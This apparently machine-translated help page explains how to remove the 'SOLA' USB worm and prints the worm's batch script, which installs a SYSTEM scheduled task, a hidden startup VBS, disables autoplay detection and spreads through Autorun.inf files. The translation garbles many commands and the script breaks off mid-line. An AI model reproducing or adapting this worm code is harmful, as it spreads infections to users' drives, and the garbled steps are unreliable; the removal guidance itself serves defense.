Red de conocimiento de abogados - Derecho de sociedades - ¿Cómo solucionar el virus otaku (virus sola)?

¿Cómo solucionar el virus otaku (virus sola)?

Solución 2:

1. Ingrese al modo seguro

1. Utilice también el "Administrador de recursos" para ingresar al directorio de cada letra de unidad y eliminar el "SOLA" oculto. carpeta y el archivo "Autorun.inf"

Luego, vaya al sitio web de 360 ​​para descargar una "Herramienta para eliminar virus de disco U". Una vez completada la eliminación, aparecerá una ventana emergente "Si... ." haga clic en "Sí" y luego le preguntará "¿Desea crear XXX?"

Haga clic en Crear y el software creará un archivo de virus falso llamado "Autorun.inf" debajo de cada letra de unidad. , evitando así que los virus vuelvan a crear este archivo.

2. "Buscar archivos o carpetas" para todos los archivos y carpetas con la palabra clave "sola" y eliminar todos los archivos y carpetas relacionados con el nombre sola.

3. Los siguientes archivos se pueden encontrar y eliminar manualmente.

raíz del sistema\\Fonts\\Regedit.reg

raíz del sistema\\Fonts\\sleep.exe

raíz del sistema\\Fonts\\SOLA.BAT

raíz del sistema\\Fonts\\est_type2032.fon

raíz del sistema\\Tasks\\Tasks.job

raíz del sistema\\Fonts\\solasetup

systemroot\\Tasks\\Tasks.job

4. Ordene por hora de creación y elimine todos los archivos creados al mismo tiempo.

5. Abra el registro (haga clic en "Inicio" - "Ejecutar", ingrese "regedit" y presione Entrar)

6. en el lado izquierdo del registro "Mi PC", luego haga clic en "Editar" - "Buscar", ingrese "SOLA" para eliminar todos los "elementos", "valores" y "datos" relacionados

Nota: algunos El software tiene "SOLA”, pero no es un virus y es necesario distinguirlo. (Como se muestra en la figura siguiente, no es un elemento de virus). El "elemento", el "valor" y los "datos" del virus generalmente se pueden ver de un vistazo.

[attach]27266[/attach]

-----------------------

7. Para ejecutarse automáticamente después del arranque, los troyanos suelen agregar entradas de registro a las siguientes opciones en el registro:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion \RunServices

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

Eliminar elementos desconocidos.

(También puede usar 360 ​​Security Guard para ver los elementos de inicio)

Hay un archivo SOLA.vbs en "C:\\Documentos y configuraciones\\Todos los usuarios\\Menú Inicio\\Programa\ \Inicio"

(Nota: no lo recuerdo claramente porque olvidé guardar la muestra del archivo)

8. Finalmente, verifique todas las letras de las unidades y vea " SOLA" Compruebe si la carpeta se ha eliminado. Si aún existe, elimínela nuevamente. No es necesario eliminar el archivo "Autorun.inf". Es un archivo creado mediante herramientas especiales de eliminación para engañar a los virus.

9. Elimínela. La carpeta "SOLA" en todos los dispositivos de interfaz USB, como discos U y MP3, por supuesto, aquellos que utilicen lectores de tarjetas de memoria de teléfonos móviles también ganarán la oferta. Reinicia el ordenador y listo.

A continuación se adjunta el contenido de "sola.bat":

@echo off

set sola=systemroot\\Fonts

configure setup=systemroot\\Fonts\\solasetup

si no \"1\"==\"-USB\" vaya a Inicio

iniciar /max ..

si existe sola\\SOLA.BAT ir al final

::=========================Infectar=== ===========================

:Infectar

cd\\

md systemroot\\Fonts\\solasetup

:————Copiar archivo---------

copiar sola\\Autorun.inf setup \ \Autorun.inf

copiar sola\\SOLA.BAT setup\\SOLA.BAT

copiar sola\\Otaku por favor entra.RAR setup\\Otaku por favor entra.RAR

copiar sola\\Tasks.xxx setup\\Tasks.xxx

copiar sola\\sleep.exe setup\\sleep.exe

lista de tareas gt; sola \\task.txt

FOR /F \"tokens=1\" i in (\'findstr /I \"svchost.exe\" \"sola\\task.txt\"\' ) configure svchost=i

copiar systemroot\\system32\\cmd.exe sola\\svchost

del sola\\task.txt

:Tareas

copiar configuración\\Tasks.xxx systemroot\\Tasks\\Tasks.job

schtasks /change /ru \"NT AUTHORITY\\SYSTEM\" /tn \"Tasks\ " si el nivel de error 1 va a TaskFail

va a TaskSuc

:TaskFail

homedrive

cd \"ALLUSERSPROFILE\"

cd Menú "Inicio"\\Programas\\Inicio

echo en caso de error Reanudar siguiente;SOLA.VBS

echo set ws=wscript.createobject(\"wscript.shell\ " )gt;gt;SOLA.VBS

echo ws.run \"sola\\svchost.exe /c sola\\SOLA.BAT\", 0 gt;gt;SOLA.VBS

copia SOLA.VBS sola\\SOLA.VBS

echo NTgt\\Fonts\\NoTasks

: TaskSuc

attrib systemroot\ \ Tareas\\Tarea

s.job s h r

copiar configuración\\sola.bat sola\\sola.bat

copiar configuración\\sleep.exe systemroot\\system32\\sleep.exe

:NoAutoPlay

net stop \"Detección de hardware de Shell\"

echo Editor del Registro de Windows versión 5.00gt systemroot\\Fonts\\Regedit.reg

echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\ShellHWDetection]gt;gt;systemroot\\Fonts\\Regedit.reg

echo \"Start\"=dword: 00000004gt; gt; systemroot\\Fonts\\Regedit.reg

iniciar regedit /s systemroot\\Fonts\\Regedit.reg

: KillTMG

ir a Fin

::======================Infectar==================== === ===================

::==================== === Inicio=========================================

:Inicio

homedrive

cd \"ALLUSERSPROFILE\"

cd menú "Inicio"\\Programas\\Inicio

fecha /t gt; sola\\est_type2032.fon

findstr /c:\"-10-01\" \"sola\\est_type2032.fon\" si no es nivel de error 1, vaya a DayOn

si existe systemroot\\Fonts\\NoTasks si no existe SOLA.VBS copia sola\\SOLA.VBS SOLA.VBS

:Continuar

dormir 300set C=0 amp; echo 1gt;C :\\solachk1 amp; findtr . C:\\solachk1 amp; si no es nivel de error 1 del C:\\solachk1 amp; " C:\ \Autorun.inf amp; si el atributo de nivel de error 1 -s -h -r C:\\Autorun.inf

上篇: ¿Cómo realizar la misión de niebla DNF? 下篇: No importa quién soy